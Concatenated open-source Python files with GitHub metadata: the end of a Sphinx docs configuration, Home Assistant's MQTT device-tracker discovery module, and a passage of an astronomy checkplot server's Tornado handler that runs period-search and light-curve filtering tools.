# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| {
"content_hash": "bbb4c9b37c344037e06ecac2165071d0",
"timestamp": "",
"source": "github",
"line_count": 350,
"max_line_length": 80,
"avg_line_length": 31.534285714285716,
"alnum_prop": 0.7063513635951798,
"repo_name": "dhhagan/atmospy",
"id": "6662abee72068440c81cf548d60ef2f27d9c971c",
"size": "11457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/source/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "33787"
},
{
"name": "Python",
"bytes": "22861"
}
],
"symlink_target": ""
} |
"""Support for tracking MQTT enabled devices identified through discovery."""
import logging
import voluptuous as vol
from homeassistant.components import device_tracker
from homeassistant.components.device_tracker import SOURCE_TYPES
from homeassistant.components.device_tracker.config_entry import TrackerEntity
from homeassistant.const import (
ATTR_GPS_ACCURACY,
ATTR_LATITUDE,
ATTR_LONGITUDE,
CONF_DEVICE,
CONF_ICON,
CONF_NAME,
CONF_UNIQUE_ID,
CONF_VALUE_TEMPLATE,
STATE_HOME,
STATE_NOT_HOME,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .. import (
MqttAttributes,
MqttAvailability,
MqttDiscoveryUpdate,
MqttEntityDeviceInfo,
subscription,
)
from ... import mqtt
from ..const import ATTR_DISCOVERY_HASH, CONF_QOS, CONF_STATE_TOPIC
from ..debug_info import log_messages
from ..discovery import MQTT_DISCOVERY_NEW, clear_discovery_hash
_LOGGER = logging.getLogger(__name__)
CONF_PAYLOAD_HOME = "payload_home"
CONF_PAYLOAD_NOT_HOME = "payload_not_home"
CONF_SOURCE_TYPE = "source_type"
PLATFORM_SCHEMA_DISCOVERY = (
mqtt.MQTT_RO_PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
vol.Optional(CONF_ICON): cv.icon,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_PAYLOAD_HOME, default=STATE_HOME): cv.string,
vol.Optional(CONF_PAYLOAD_NOT_HOME, default=STATE_NOT_HOME): cv.string,
vol.Optional(CONF_SOURCE_TYPE): vol.In(SOURCE_TYPES),
vol.Optional(CONF_UNIQUE_ID): cv.string,
}
)
.extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
.extend(mqtt.MQTT_JSON_ATTRS_SCHEMA.schema)
)
async def async_setup_entry_from_discovery(hass, config_entry, async_add_entities):
"""Set up MQTT device tracker dynamically through MQTT discovery."""
async def async_discover(discovery_payload):
"""Discover and add an MQTT device tracker."""
discovery_data = discovery_payload.discovery_data
try:
config = PLATFORM_SCHEMA_DISCOVERY(discovery_payload)
await _async_setup_entity(
hass, config, async_add_entities, config_entry, discovery_data
)
except Exception:
clear_discovery_hash(hass, discovery_data[ATTR_DISCOVERY_HASH])
raise
async_dispatcher_connect(
hass, MQTT_DISCOVERY_NEW.format(device_tracker.DOMAIN, "mqtt"), async_discover
)
async def _async_setup_entity(
hass, config, async_add_entities, config_entry=None, discovery_data=None
):
"""Set up the MQTT Device Tracker entity."""
async_add_entities([MqttDeviceTracker(hass, config, config_entry, discovery_data)])
class MqttDeviceTracker(
MqttAttributes,
MqttAvailability,
MqttDiscoveryUpdate,
MqttEntityDeviceInfo,
TrackerEntity,
):
"""Representation of a device tracker using MQTT."""
def __init__(self, hass, config, config_entry, discovery_data):
"""Initialize the tracker."""
self.hass = hass
self._location_name = None
self._sub_state = None
self._unique_id = config.get(CONF_UNIQUE_ID)
# Load config
self._setup_from_config(config)
device_config = config.get(CONF_DEVICE)
MqttAttributes.__init__(self, config)
MqttAvailability.__init__(self, config)
MqttDiscoveryUpdate.__init__(self, discovery_data, self.discovery_update)
MqttEntityDeviceInfo.__init__(self, device_config, config_entry)
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await super().async_added_to_hass()
await self._subscribe_topics()
async def discovery_update(self, discovery_payload):
"""Handle updated discovery message."""
config = PLATFORM_SCHEMA_DISCOVERY(discovery_payload)
self._setup_from_config(config)
await self.attributes_discovery_update(config)
await self.availability_discovery_update(config)
await self.device_info_discovery_update(config)
await self._subscribe_topics()
self.async_write_ha_state()
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
self._config = config
value_template = self._config.get(CONF_VALUE_TEMPLATE)
if value_template is not None:
value_template.hass = self.hass
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
@callback
@log_messages(self.hass, self.entity_id)
def message_received(msg):
"""Handle new MQTT messages."""
payload = msg.payload
value_template = self._config.get(CONF_VALUE_TEMPLATE)
if value_template is not None:
payload = value_template.async_render_with_possible_json_value(payload)
if payload == self._config[CONF_PAYLOAD_HOME]:
self._location_name = STATE_HOME
elif payload == self._config[CONF_PAYLOAD_NOT_HOME]:
self._location_name = STATE_NOT_HOME
else:
self._location_name = msg.payload
self.async_write_ha_state()
self._sub_state = await subscription.async_subscribe_topics(
self.hass,
self._sub_state,
{
"state_topic": {
"topic": self._config[CONF_STATE_TOPIC],
"msg_callback": message_received,
"qos": self._config[CONF_QOS],
}
},
)
async def async_will_remove_from_hass(self):
"""Unsubscribe when removed."""
self._sub_state = await subscription.async_unsubscribe_topics(
self.hass, self._sub_state
)
await MqttAttributes.async_will_remove_from_hass(self)
await MqttAvailability.async_will_remove_from_hass(self)
await MqttDiscoveryUpdate.async_will_remove_from_hass(self)
@property
def icon(self):
"""Return the icon of the device."""
return self._config.get(CONF_ICON)
@property
def latitude(self):
"""Return latitude if provided in device_state_attributes or None."""
if (
self.device_state_attributes is not None
and ATTR_LATITUDE in self.device_state_attributes
):
return self.device_state_attributes[ATTR_LATITUDE]
return None
@property
def location_accuracy(self):
"""Return location accuracy if provided in device_state_attributes or None."""
if (
self.device_state_attributes is not None
and ATTR_GPS_ACCURACY in self.device_state_attributes
):
return self.device_state_attributes[ATTR_GPS_ACCURACY]
return None
@property
def longitude(self):
"""Return longitude if provided in device_state_attributes or None."""
if (
self.device_state_attributes is not None
and ATTR_LONGITUDE in self.device_state_attributes
):
return self.device_state_attributes[ATTR_LONGITUDE]
return None
@property
def location_name(self):
"""Return a location name for the current location of the device."""
return self._location_name
@property
def name(self):
"""Return the name of the device tracker."""
return self._config.get(CONF_NAME)
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def source_type(self):
"""Return the source type, eg gps or router, of the device."""
return self._config.get(CONF_SOURCE_TYPE)
| {
"content_hash": "1005f8759d2fc987d1b4501a6419d7f0",
"timestamp": "",
"source": "github",
"line_count": 230,
"max_line_length": 87,
"avg_line_length": 34.082608695652176,
"alnum_prop": 0.6387294297742059,
"repo_name": "tboyce021/home-assistant",
"id": "4de2ae4fa6d576e0f3403e18a9e557c5d296a819",
"size": "7839",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/mqtt/device_tracker/schema_discovery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "28861968"
},
{
"name": "Shell",
"bytes": "4815"
}
],
"symlink_target": ""
} |
'''
These are Tornado handlers for serving checkplots and operating on them.
'''
####################
## SYSTEM IMPORTS ##
####################
import os
import os.path
import base64
import logging
from io import BytesIO as StrIO
import numpy as np
import pickle
import json
from .checkplotserver_handlers import FrontendEncoder
# this replaces the default encoder and makes it so Tornado will do the right
# thing when it converts dicts to JSON when a
# tornado.web.RequestHandler.write(dict) is called.
json._default_encoder = FrontendEncoder()
#############
## LOGGING ##
#############
# get a logger
LOGGER = logging.getLogger(__name__)
#####################
## TORNADO IMPORTS ##
#####################
import tornado.ioloop
import tornado.httpserver
import tornado.web
from tornado.escape import xhtml_escape, url_unescape
from tornado import gen
###################
## LOCAL IMPORTS ##
###################
from .. import lcmath
from ..checkplot.pkl_io import (
_read_checkplot_picklefile,
_write_checkplot_picklefile
)
from ..checkplot.pkl_utils import _pkl_periodogram, _pkl_phased_magseries_plot
from .. import lcfit
from .checkplotserver_handlers import CPTOOLMAP
#############################
## CHECKPLOT TOOL HANDLERS ##
#############################
class LCToolHandler(tornado.web.RequestHandler):
'''This handles dispatching light curve analysis tasks.
GET requests run the light curve tools specified in the URI with arguments
as specified in the args to the URI.
POST requests write the results to the JSON file. The frontend JS object is
automatically updated by the frontend code.
'''
def initialize(self, currentdir, assetpath, cplist,
cplistfile, executor, readonly):
'''
This handles initial setup of the `RequestHandler`.
'''
self.currentdir = currentdir
self.assetpath = assetpath
self.currentproject = cplist
self.cplistfile = cplistfile
self.executor = executor
self.readonly = readonly
@gen.coroutine
def get(self, cpfile):
'''This handles a GET request to run a specified LC tool.
Parameters
----------
cpfile : str
This is the checkplot file to run the tool on.
Returns
-------
str
Returns a JSON response.
Notes
-----
The URI structure is::
/tools/<cpfile>?[args]
where args are::
?lctool=<lctool>&argkey1=argval1&argkey2=argval2&...
&forcereload=true <- if this is present, then reload values from
original checkplot.
&objectid=<objectid>
`lctool` is one of the strings below
Period search functions::
psearch-gls: run Lomb-Scargle with given params
psearch-bls: run BLS with given params
psearch-pdm: run phase dispersion minimization with given params
psearch-aov: run analysis-of-variance with given params
psearch-mav: run analysis-of-variance (multi-harm) with given params
psearch-acf: run ACF period search with given params
psearch-win: run spectral window function search with given params
Arguments recognized by all period-search functions are::
startp=XX
endp=XX
magsarefluxes=True|False
autofreq=True|False
stepsize=XX
Variability characterization functions::
var-varfeatures: gets the variability features from the checkplot or
recalculates if they're not present
var-prewhiten: pre-whitens the light curve with a sinusoidal signal
var-masksig: masks a given phase location with given width from the
light curve
Light curve manipulation functions ::
phasedlc-newplot: make phased LC with new provided period/epoch
lcfit-fourier: fit a Fourier function to the phased LC
lcfit-spline: fit a spline function to the phased LC
lcfit-legendre: fit a Legendre polynomial to the phased LC
lcfit-savgol: fit a Savitsky-Golay polynomial to the phased LC
FIXME: figure out how to cache the results of these functions
temporarily and save them back to the checkplot after we click on save
in the frontend.
TODO: look for a checkplot-blah-blah.pkl-cps-processing file in the same
place as the usual pickle file. if this exists and is newer than the pkl
file, load it instead. Or have a checkplotdict['cpservertemp'] item.
'''
if cpfile:
self.cpfile = (
xhtml_escape(base64.b64decode(url_unescape(cpfile)))
)
# see if this plot is in the current project
if self.cpfile in self.currentproject['checkplots']:
# make sure this file exists
cpfpath = os.path.join(
os.path.abspath(os.path.dirname(self.cplistfile)),
self.cpfile
)
# if we can't find the pickle, quit immediately
if not os.path.exists(cpfpath):
msg = "couldn't find checkplot %s" % cpfpath
LOGGER.error(msg)
resultdict = {'status':'error',
'message':msg,
'readonly':self.readonly,
'result':None}
self.write(resultdict)
raise tornado.web.Finish()
###########################
# now parse the arguments #
###########################
# check if we have to force-reload
forcereload = self.get_argument('forcereload',False)
if forcereload and xhtml_escape(forcereload):
forcereload = True if forcereload == 'true' else False
# get the objectid
cpobjectid = self.get_argument('objectid',None)
# get the light curve tool to use
lctool = self.get_argument('lctool', None)
# preemptive dict to fill out
resultdict = {'status':None,
'message':None,
'readonly':self.readonly,
'result':None}
# check if the lctool arg is provided
if lctool:
lctool = xhtml_escape(lctool)
lctoolargs = []
lctoolkwargs = {}
# check if this lctool is OK and has all the required args
if lctool in CPTOOLMAP:
try:
# all args should have been parsed
# successfully. parse the kwargs now
for xkwarg, xkwargtype, xkwargdef in zip(
CPTOOLMAP[lctool]['kwargs'],
CPTOOLMAP[lctool]['kwargtypes'],
CPTOOLMAP[lctool]['kwargdefs']
):
# get the kwarg
if xkwargtype is list:
wbkwarg = self.get_arguments(xkwarg)
if len(wbkwarg) > 0:
wbkwarg = [url_unescape(xhtml_escape(x))
for x in wbkwarg]
else:
wbkwarg = None
else:
wbkwarg = self.get_argument(xkwarg, None)
if wbkwarg is not None:
wbkwarg = url_unescape(
xhtml_escape(wbkwarg)
)
LOGGER.info('xkwarg = %s, wbkwarg = %s' %
(xkwarg, repr(wbkwarg)))
# if it's None, sub with the default
if wbkwarg is None:
wbkwarg = xkwargdef
# otherwise, cast it to the required type
else:
# special handling for lists of floats
if xkwargtype is list:
wbkwarg = [float(x) for x in wbkwarg]
# special handling for booleans
elif xkwargtype is bool:
if wbkwarg == 'false':
wbkwarg = False
elif wbkwarg == 'true':
wbkwarg = True
else:
wbkwarg = xkwargdef
# usual casting for other types
else:
wbkwarg = xkwargtype(wbkwarg)
# update the lctools kwarg dict
# make sure to remove any [] from the kwargs
# this was needed to parse the input query
# string correctly
if xkwarg.endswith('[]'):
xkwarg = xkwarg.rstrip('[]')
lctoolkwargs.update({xkwarg:wbkwarg})
except Exception:
LOGGER.exception('lctool %s, kwarg %s '
'will not work' %
(lctool, xkwarg))
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s, kwarg %s '
'will not work' %
(lctool, xkwarg)
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
# if the tool is not in the CPTOOLSMAP
else:
LOGGER.error('lctool %s, does not exist' % lctool)
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s does not exist' % lctool
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
# if no lctool arg is provided
else:
LOGGER.error('lctool argument not provided')
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool argument not provided'
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
##############################################
## NOW WE'RE READY TO ACTUALLY DO SOMETHING ##
##############################################
LOGGER.info('loading %s...' % cpfpath)
# this loads the actual checkplot pickle
cpdict = yield self.executor.submit(
_read_checkplot_picklefile, cpfpath
)
# we check for the existence of a cpfpath + '-cpserver-temp'
# file first. this is where we store stuff before we write it
# back to the actual checkplot.
tempfpath = cpfpath + '-cpserver-temp'
# load the temp checkplot if it exists
if os.path.exists(tempfpath):
tempcpdict = yield self.executor.submit(
_read_checkplot_picklefile, tempfpath
)
# if it doesn't exist, read the times, mags, errs from the
# actual checkplot in prep for working on it
else:
tempcpdict = {
'objectid':cpdict['objectid'],
'magseries':{
'times':cpdict['magseries']['times'],
'mags':cpdict['magseries']['mags'],
'errs':cpdict['magseries']['errs'],
}
}
# if we're not forcing a rerun from the original checkplot dict
if not forcereload:
cptimes, cpmags, cperrs = (
tempcpdict['magseries']['times'],
tempcpdict['magseries']['mags'],
tempcpdict['magseries']['errs'],
)
LOGGER.info('forcereload = False')
# otherwise, reload the original times, mags, errs
else:
cptimes, cpmags, cperrs = (cpdict['magseries']['times'],
cpdict['magseries']['mags'],
cpdict['magseries']['errs'])
LOGGER.info('forcereload = True')
# collect the args
for xarg, xargtype in zip(CPTOOLMAP[lctool]['args'],
CPTOOLMAP[lctool]['argtypes']):
# handle special args
if xarg is None:
lctoolargs.append(None)
elif xarg == 'times':
lctoolargs.append(cptimes)
elif xarg == 'mags':
lctoolargs.append(cpmags)
elif xarg == 'errs':
lctoolargs.append(cperrs)
# handle other args
else:
try:
if xargtype is list:
wbarg = self.get_arguments(xarg)
else:
wbarg = url_unescape(
xhtml_escape(
self.get_argument(xarg, None)
)
)
# cast the arg to the required type
# special handling for lists
if xargtype is list:
wbarg = [float(x) for x in wbarg]
# special handling for epochs that can be optional
elif xargtype is float and xarg == 'varepoch':
try:
wbarg = xargtype(wbarg)
except Exception:
wbarg = None
# usual casting for other types
else:
wbarg = xargtype(wbarg)
lctoolargs.append(wbarg)
except Exception:
LOGGER.exception('lctool %s, arg %s '
'will not work' %
(lctool, xarg))
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s, arg %s '
'will not work' %
(lctool, xarg)
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
LOGGER.info(lctool)
LOGGER.info(lctoolargs)
LOGGER.info(lctoolkwargs)
############################
## handle the lctools now ##
############################
# make sure the results aren't there already.
# if they are and force-reload is not True,
# just return them instead.
resloc = CPTOOLMAP[lctool]['resloc']
# TODO: figure out a way to make the dispatched tasks
# cancellable. This can probably be done by having a global
# TOOLQUEUE object that gets imported on initialize(). In this
# object, we could put in key:vals like so:
#
# TOOLQUEUE['lctool-<toolname>-cpfpath'] = (
# yield self.executor.submit(blah, *blah_args, **blah_kwargs)
# )
#
# then we probably need some sort of frontend AJAX call that
# enqueues things and can then cancel stuff from the queue. see
# stuff we need to figure out:
# - if the above scheme actually yields so we remain async
# - if the Future object supports cancellation
# - if the Future object that isn't resolved actually works
# get the objectid. we'll send this along with every
# result. this should handle the case of the current objectid
# not being the same as the objectid being looked at by the
# user. in effect, this will allow the user to launch a
# long-running process and come back to it later since the
# frontend will load the older results when they are complete.
objectid = cpdict['objectid']
# if lctool is a periodogram method
if lctool in ('psearch-gls',
'psearch-bls',
'psearch-pdm',
'psearch-aov',
'psearch-mav',
'psearch-acf',
'psearch-win'):
lspmethod = resloc[0]
# if we can return the results from a previous run
if (lspmethod in tempcpdict and
isinstance(tempcpdict[lspmethod], dict) and
(not forcereload)):
# for a periodogram method, we need the
# following items
bestperiod = (
tempcpdict[lspmethod]['bestperiod']
)
nbestperiods = (
tempcpdict[lspmethod]['nbestperiods']
)
nbestlspvals = (
tempcpdict[lspmethod]['nbestlspvals']
)
periodogram = (
tempcpdict[lspmethod]['periodogram']
)
# get the first phased LC plot and its period
# and epoch
phasedlc0plot = (
tempcpdict[lspmethod][0]['plot']
)
phasedlc0period = float(
tempcpdict[lspmethod][0]['period']
)
phasedlc0epoch = float(
tempcpdict[lspmethod][0]['epoch']
)
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
'nbestperiods':nbestperiods,
'periodogram':periodogram,
'bestperiod':bestperiod,
'nbestpeaks':nbestlspvals,
'phasedlc0':{
'plot':phasedlc0plot,
'period':phasedlc0period,
'epoch':phasedlc0epoch,
}
}
}
self.write(resultdict)
self.finish()
# otherwise, we have to rerun the periodogram method
else:
# see if sigclip is set. if so, then do the sigclip on
# the times, mags, errs
if lctoolkwargs['sigclip'] is not None:
wtimes, wmags, werrs = lcmath.sigclip_magseries(
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
sigclip=lctoolkwargs['sigclip'],
magsarefluxes=lctoolkwargs['magsarefluxes']
)
lctoolargs[0] = wtimes
lctoolargs[1] = wmags
lctoolargs[2] = werrs
#
# process the LC filters now
#
# see if the lctimefilters are set
if lctoolkwargs['lctimefilters']:
wtimes, wmags, werrs = (lctoolargs[0],
lctoolargs[1],
lctoolargs[2])
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the time filter strings
filterstr = lctoolkwargs['lctimefilters']
filters = filterstr.split(',')
filters = [
x.strip().lstrip('(').rstrip(')').strip()
for x in filters
]
for filt in filters:
try:
thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
(((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
lctoolargs[0] = wtimes[filterind]
lctoolargs[1] = wmags[filterind]
lctoolargs[2] = werrs[filterind]
# see if the lcmagfilters are set
if lctoolkwargs['lcmagfilters']:
wtimes, wmags, werrs = (lctoolargs[0],
lctoolargs[1],
lctoolargs[2])
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the time filter strings
filterstr = lctoolkwargs['lcmagfilters']
filters = filterstr.split(',')
filters = [
x.strip().strip()
for x in filters
]
for filt in filters:
try:
thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
(wmags < filt_hi) &
(wmags > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
((wmags < filt_hi) &
(wmags > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
lctoolargs[0] = wtimes[filterind]
lctoolargs[1] = wmags[filterind]
lctoolargs[2] = werrs[filterind]
# at the end of processing, remove from lctookwargs
# since the pfmethod doesn't know about this
del lctoolkwargs['lctimefilters']
del lctoolkwargs['lcmagfilters']
#
# now run the period finder and get results
#
lctoolfunction = CPTOOLMAP[lctool]['func']
# run the period finder
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# get what we need out of funcresults when it
# returns.
nbestperiods = funcresults['nbestperiods']
nbestlspvals = funcresults['nbestlspvals']
bestperiod = funcresults['bestperiod']
# generate the periodogram png
pgramres = yield self.executor.submit(
_pkl_periodogram,
funcresults,
)
# generate the phased LCs. we show these in the frontend
# along with the periodogram.
phasedlcargs0 = (None,
lspmethod,
-1,
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
nbestperiods[0],
'min')
if len(nbestperiods) > 1:
phasedlcargs1 = (None,
lspmethod,
-1,
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
nbestperiods[1],
'min')
else:
phasedlcargs1 = None
if len(nbestperiods) > 2:
phasedlcargs2 = (None,
lspmethod,
-1,
lctoolargs[0],
lctoolargs[1],
lctoolargs[2],
nbestperiods[2],
'min')
else:
phasedlcargs2 = None
# here, we set a bestperiodhighlight to distinguish this
# plot from the ones existing in the checkplot already
phasedlckwargs = {
'xliminsetmode':False,
'magsarefluxes':lctoolkwargs['magsarefluxes'],
'bestperiodhighlight':'#defa75',
}
# dispatch the plot functions
phasedlc0 = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs0,
**phasedlckwargs
)
if phasedlcargs1 is not None:
phasedlc1 = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs1,
**phasedlckwargs
)
else:
phasedlc1 = None
if phasedlcargs2 is not None:
phasedlc2 = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs2,
**phasedlckwargs
)
else:
phasedlc2 = None
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
tempcpdict[lspmethod] = {
'periods':funcresults['periods'],
'lspvals':funcresults['lspvals'],
'bestperiod':funcresults['bestperiod'],
'nbestperiods':funcresults['nbestperiods'],
'nbestlspvals':funcresults['nbestlspvals'],
'periodogram':(
pgramres[lspmethod]['periodogram']
),
0:phasedlc0,
}
if phasedlc1 is not None:
tempcpdict[lspmethod][1] = phasedlc1
if phasedlc2 is not None:
tempcpdict[lspmethod][2] = phasedlc2
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
' because readonly = True'
)
#
# assemble the return dict
#
# the periodogram
periodogram = pgramres[lspmethod]['periodogram']
# phasedlc plot, period, and epoch for best 3 peaks
phasedlc0plot = phasedlc0['plot']
phasedlc0period = float(phasedlc0['period'])
phasedlc0epoch = float(phasedlc0['epoch'])
if phasedlc1 is not None:
phasedlc1plot = phasedlc1['plot']
phasedlc1period = float(phasedlc1['period'])
phasedlc1epoch = float(phasedlc1['epoch'])
if phasedlc2 is not None:
phasedlc2plot = phasedlc2['plot']
phasedlc2period = float(phasedlc2['period'])
phasedlc2epoch = float(phasedlc2['epoch'])
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
'nbestperiods':nbestperiods,
'nbestpeaks':nbestlspvals,
'periodogram':periodogram,
'bestperiod':bestperiod,
'phasedlc0':{
'plot':phasedlc0plot,
'period':phasedlc0period,
'epoch':phasedlc0epoch,
},
}
}
if phasedlc1 is not None:
resultdict['result'][lspmethod]['phasedlc1'] = {
'plot':phasedlc1plot,
'period':phasedlc1period,
'epoch':phasedlc1epoch,
}
if phasedlc2 is not None:
resultdict['result'][lspmethod]['phasedlc2'] = {
'plot':phasedlc2plot,
'period':phasedlc2period,
'epoch':phasedlc2epoch,
}
# return to frontend
self.write(resultdict)
self.finish()
# if the lctool is a call to the phased LC plot itself
# this requires lots of parameters
# these should all be present in the frontend
elif lctool == 'phasedlc-newplot':
lspmethod = lctoolargs[1]
periodind = lctoolargs[2]
# if we can return the results from a previous run
if (not forcereload and lspmethod in tempcpdict and
isinstance(tempcpdict[lspmethod], dict) and
periodind in tempcpdict[lspmethod] and
isinstance(tempcpdict[lspmethod][periodind], dict)):
# we get phased LC at periodind from a previous run
phasedlc = tempcpdict[lspmethod][periodind]
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
retkey = 'phasedlc%s' % periodind
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
retkey:phasedlc
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
# add the highlight to distinguish this plot from usual
# checkplot plots
# full disclosure: http://c0ffee.surge.sh/
lctoolkwargs['bestperiodhighlight'] = '#defa75'
# set the input periodind to -1 to make sure we still
# have the highlight on the plot. we use the correct
# periodind when returning
lctoolargs[2] = -1
# see if sigclip is set. if so, then do the sigclip on
# the times, mags, errs
if lctoolkwargs['sigclip'] is not None:
stimes, smags, serrs = lcmath.sigclip_magseries(
lctoolargs[3],
lctoolargs[4],
lctoolargs[5],
sigclip=lctoolkwargs['sigclip'],
magsarefluxes=lctoolkwargs['magsarefluxes']
)
else:
stimes, smags, serrs = (lctoolargs[3],
lctoolargs[4],
lctoolargs[5])
#
# process the LC filters now
#
# see if the lctimefilters are set
if lctoolkwargs['lctimefilters']:
wtimes, wmags, werrs = stimes, smags, serrs
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the time filter strings
filterstr = lctoolkwargs['lctimefilters']
filters = filterstr.split(',')
filters = [
x.strip().lstrip('(').rstrip(')').strip()
for x in filters
]
for filt in filters:
try:
thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
(((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
stimes = wtimes[filterind]
smags = wmags[filterind]
serrs = werrs[filterind]
# see if the lcmagfilters are set
if lctoolkwargs['lcmagfilters']:
wtimes, wmags, werrs = stimes, smags, serrs
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the time filter strings
filterstr = lctoolkwargs['lcmagfilters']
filters = filterstr.split(',')
filters = [
x.strip().strip()
for x in filters
]
for filt in filters:
try:
thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
(wmags < filt_hi) &
(wmags > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
((wmags < filt_hi) &
(wmags > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
stimes = wtimes[filterind]
smags = wmags[filterind]
serrs = werrs[filterind]
# at the end of processing, remove from lctookwargs
# since the pfmethod doesn't know about this
del lctoolkwargs['lctimefilters']
del lctoolkwargs['lcmagfilters']
# if the varepoch is set to None, try to get the
# minimum-light epoch using a spline fit
if lctoolargs[-1] is None:
LOGGER.warning(
'automatically getting min epoch '
'for phased LC plot'
)
try:
spfit = lcfit.spline_fit_magseries(
stimes, # times
smags, # mags
serrs, # errs
